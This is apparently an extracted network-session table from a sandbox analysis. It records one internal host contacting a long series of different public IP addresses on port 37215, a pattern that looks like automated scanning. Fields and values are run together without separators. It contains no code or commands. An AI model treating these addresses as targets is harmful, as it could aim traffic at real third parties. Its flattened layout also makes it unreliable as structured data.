                                              11842192.168.2.1558924197.90.240.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11843192.168.2.1541842186.40.247.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11844192.168.2.1536710186.60.5.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11845192.168.2.153614841.68.28.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11846192.168.2.1546696102.217.68.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11847192.168.2.155672237.175.162.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11848192.168.2.155939894.136.230.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11849192.168.2.1539520197.160.180.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11850192.168.2.1535328122.208.48.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11851192.168.2.153723894.192.126.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11852192.168.2.1536170190.129.198.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11853192.168.2.155744437.143.254.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11854192.168.2.1555150102.128.172.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11855192.168.2.1541160102.156.158.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11856192.168.2.1538008102.31.159.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11857192.168.2.1535488156.195.118.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11858192.168.2.1555308102.204.85.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11859192.168.2.1538758181.231.166.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11860192.168.2.1554912156.218.119.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11861192.168.2.1538324121.92.56.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11862192.168.2.1540324197.85.229.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11863192.168.2.1542526222.250.154.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11864192.168.2.1540342156.102.154.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11865192.168.2.1543384156.11.165.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11866192.168.2.154647637.6.143.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11867192.168.2.1546454222.241.143.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11868192.168.2.154448245.122.122.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11869192.168.2.154129894.127.115.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11870192.168.2.153845637.80.220.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11871192.168.2.1552094102.96.218.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11872192.168.2.1557700181.22.220.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11873192.168.2.155030241.251.166.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11874192.168.2.1554264156.46.229.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11875192.168.2.1559832102.117.62.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11876192.168.2.153317441.119.6.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11877192.168.2.154900894.86.54.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11878192.168.2.153521445.132.149.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11879192.168.2.1559006138.118.234.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11880192.168.2.1539782121.128.155.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11881192.168.2.1543234138.122.98.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11882192.168.2.1558942181.227.149.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11883192.168.2.1547024156.190.172.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11884192.168.2.1559658190.135.18.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11885192.168.2.153505227.193.52.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11886192.168.2.1533830102.251.27.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11887192.168.2.1550638190.39.163.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11888192.168.2.153626231.52.70.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11889192.168.2.154834645.41.134.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11890192.168.2.153826841.92.0.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11891192.168.2.154588237.242.198.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11892192.168.2.1557536197.210.237.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11893192.168.2.1537140102.80.5.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11894192.168.2.1558614138.95.133.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11895192.168.2.1536296157.95.228.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11896192.168.2.155691845.14.22.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11897192.168.2.1544300190.57.193.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11898192.168.2.1559796157.97.163.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11899192.168.2.1538602190.219.100.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11900192.168.2.153292694.246.227.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11901192.168.2.153903445.224.176.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11902192.168.2.1533460122.45.238.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11903192.168.2.1553304190.183.99.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11904192.168.2.1533740134.221.202.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11905192.168.2.1540592156.75.51.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11906192.168.2.1533318156.240.233.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11907192.168.2.154065494.118.1.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11908192.168.2.1545988190.177.140.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11909192.168.2.1538140181.30.147.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11910192.168.2.1532982150.31.96.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11911192.168.2.1542838179.148.78.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11912192.168.2.154768241.7.44.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11913192.168.2.154342631.199.186.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11914192.168.2.1543582191.197.106.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11915192.168.2.1537028186.77.143.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11916192.168.2.1554986121.216.89.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11917192.168.2.154085431.67.178.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11918192.168.2.1537600181.20.240.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11919192.168.2.1560090197.64.35.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11920192.168.2.1542018121.199.141.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11921192.168.2.1551564190.237.231.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11922192.168.2.155760045.47.242.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11923192.168.2.1551644156.87.88.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11924192.168.2.154069641.110.165.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11925192.168.2.155915245.231.80.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11926192.168.2.15586921.134.91.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11927192.168.2.155181237.209.183.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11928192.168.2.1557710138.188.79.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11929192.168.2.1552448186.169.179.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11930192.168.2.153995294.110.134.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11931192.168.2.1536578156.120.18.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11932192.168.2.1550362222.87.232.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11933192.168.2.155114845.33.86.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11934192.168.2.1558594138.40.100.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11935192.168.2.1537338122.28.239.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11936192.168.2.1549700122.228.187.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11937192.168.2.1533250156.203.190.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11938192.168.2.1545468157.102.175.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11939192.168.2.154157237.213.98.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11940192.168.2.1540744157.173.182.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11941192.168.2.1538376122.245.83.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11942192.168.2.1540372157.54.97.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11943192.168.2.1541106157.60.209.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11944192.168.2.155467894.41.178.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11945192.168.2.153983231.166.21.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11946192.168.2.1535420157.92.226.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11947192.168.2.1540218190.13.164.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11948192.168.2.1547412222.6.235.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11949192.168.2.154005841.52.27.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11950192.168.2.155949831.36.67.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11951192.168.2.155383641.168.216.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11952192.168.2.1538084121.7.43.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11953192.168.2.1537062181.189.170.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11954192.168.2.1555352156.205.120.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11955192.168.2.1558598186.241.103.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11956192.168.2.1560530157.144.219.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11957192.168.2.1549912121.153.121.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11958192.168.2.1543850157.112.69.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11959192.168.2.153862045.198.81.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11960192.168.2.1545132197.102.32.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11961192.168.2.1543650122.237.100.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11962192.168.2.1542000157.250.229.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11963192.168.2.1550230156.208.233.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11964192.168.2.1537712121.76.155.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11965192.168.2.1539926181.125.6.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11966192.168.2.1539644181.170.15.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11967192.168.2.1538904157.250.219.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11968192.168.2.1558468197.172.107.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11969192.168.2.1540680156.3.33.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11970192.168.2.1541718157.166.227.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11971192.168.2.1555762181.55.12.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11972192.168.2.155006894.73.184.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11973192.168.2.1534790138.50.96.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11974192.168.2.1550214138.250.54.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11975192.168.2.1544986190.185.193.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11976192.168.2.1549554222.177.127.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11977192.168.2.153773641.175.213.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11978192.168.2.153529431.249.19.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11979192.168.2.155019641.200.175.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11980192.168.2.1541952102.238.120.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11981192.168.2.1545564102.174.54.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11982192.168.2.1555284222.64.158.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11983192.168.2.1534680122.53.169.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11984192.168.2.154651437.214.159.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11985192.168.2.1553168190.241.105.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11986192.168.2.1534666157.157.132.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11987192.168.2.153923894.204.21.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11988192.168.2.154941441.241.66.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11989192.168.2.1536112197.108.56.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11990192.168.2.1556544190.151.157.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11991192.168.2.1544340121.173.59.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11992192.168.2.155983445.233.111.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11993192.168.2.1551716122.233.177.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11994192.168.2.1537252181.6.148.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11995192.168.2.1544888222.139.156.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11996192.168.2.1536224190.195.191.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11997192.168.2.1542846190.123.16.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11998192.168.2.1543352121.236.248.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11999192.168.2.1558306126.102.252.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12000192.168.2.155675431.122.16.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12001192.168.2.1535260222.168.207.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12002192.168.2.1557340186.75.121.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12003192.168.2.1548594121.245.230.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12004192.168.2.1554020190.9.83.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12005192.168.2.154099237.235.142.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12006192.168.2.1545282197.181.47.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12007192.168.2.154546431.4.220.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12008192.168.2.154017031.119.230.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12009192.168.2.1554096190.42.27.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12010192.168.2.155258837.25.178.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12011192.168.2.1554578102.209.198.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12012192.168.2.155582894.59.143.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12013192.168.2.1556926156.142.63.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12014192.168.2.1555654138.139.125.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12015192.168.2.1542932222.17.176.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12016192.168.2.1537904157.9.150.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12017192.168.2.1539290222.20.249.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12018192.168.2.1556298186.244.166.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12019192.168.2.1545672181.207.20.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12020192.168.2.1544048121.86.214.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12021192.168.2.1555484186.95.132.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12022192.168.2.155121494.204.17.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12023192.168.2.155201445.217.255.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12024192.168.2.153503841.98.127.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12025192.168.2.1547302191.132.232.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12026192.168.2.155703894.223.20.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12027192.168.2.1532856145.145.50.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12028192.168.2.1538934190.201.151.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12029192.168.2.1560686102.12.20.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12030192.168.2.156040237.98.243.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12031192.168.2.1560276222.138.249.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12032192.168.2.1557386121.5.2.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12033192.168.2.1557800222.92.242.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12034192.168.2.1538982102.148.178.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12035192.168.2.1537592138.65.179.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12036192.168.2.153931694.125.27.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12037192.168.2.155832431.59.252.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12038192.168.2.1559936156.91.187.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12039192.168.2.1546146156.38.104.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12040192.168.2.155178294.175.223.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12041192.168.2.1551058157.144.208.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12042192.168.2.154093241.176.219.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12043192.168.2.155062441.195.98.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12044192.168.2.1550642186.115.244.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12045192.168.2.1541934138.192.69.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12046192.168.2.1552094156.248.212.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12047192.168.2.1536936121.71.1.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12048192.168.2.1546100121.81.181.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12049192.168.2.1556506157.230.232.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12050192.168.2.1556462156.24.102.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12051192.168.2.1538916213.111.59.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12052192.168.2.153460237.62.48.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12053192.168.2.1554212152.202.144.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12054192.168.2.154599237.112.122.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12055192.168.2.153928645.33.186.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12056192.168.2.155901845.119.86.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12057192.168.2.1548424157.17.100.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12058192.168.2.1549646122.71.104.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12059192.168.2.1533292157.225.184.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12060192.168.2.1550742138.87.19.21537215
